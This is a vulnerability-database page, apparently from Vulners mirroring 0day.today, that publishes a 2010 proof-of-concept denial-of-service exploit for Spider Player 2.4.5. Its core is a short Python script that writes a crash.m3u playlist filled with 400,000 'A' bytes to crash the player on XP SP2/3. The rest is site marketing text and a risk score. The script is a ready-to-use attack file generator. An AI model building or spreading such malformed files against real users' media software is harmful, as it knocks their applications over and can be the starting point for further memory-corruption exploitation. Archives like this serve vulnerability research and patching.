Lucene search
K

Spider player .m3u playlist DOS POC

🗓️ 05 Aug 2010 00:00:00Reported by Abhishek LyallType 
zdt
 zdt
🔗 0day.today👁 15 Views

Spider player .m3u playlist DOS POC author abhishek lyall - abhilyll[at]gmail[dot]co

Code
===================================
Spider player .m3u playlist DOS POC
===================================


#Spider player .m3u playlist DOS POC
#vulnerble application link http://spider-player.com/downloading?file=Spider_Player_2.4.5_Setup.exe
#tested on XP SP2/3
#author abhishek lyall - abhilyll[at]gmail[dot]com
#!/usr/bin/python

filename = "crash.m3u"


junk = "\x41" * 400000

textfile = open(filename , 'w')
textfile.write(junk)
textfile.close()



#  0day.today [2018-01-03]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Aug 2010 00:00Current
7High risk
Vulners AI Score7
15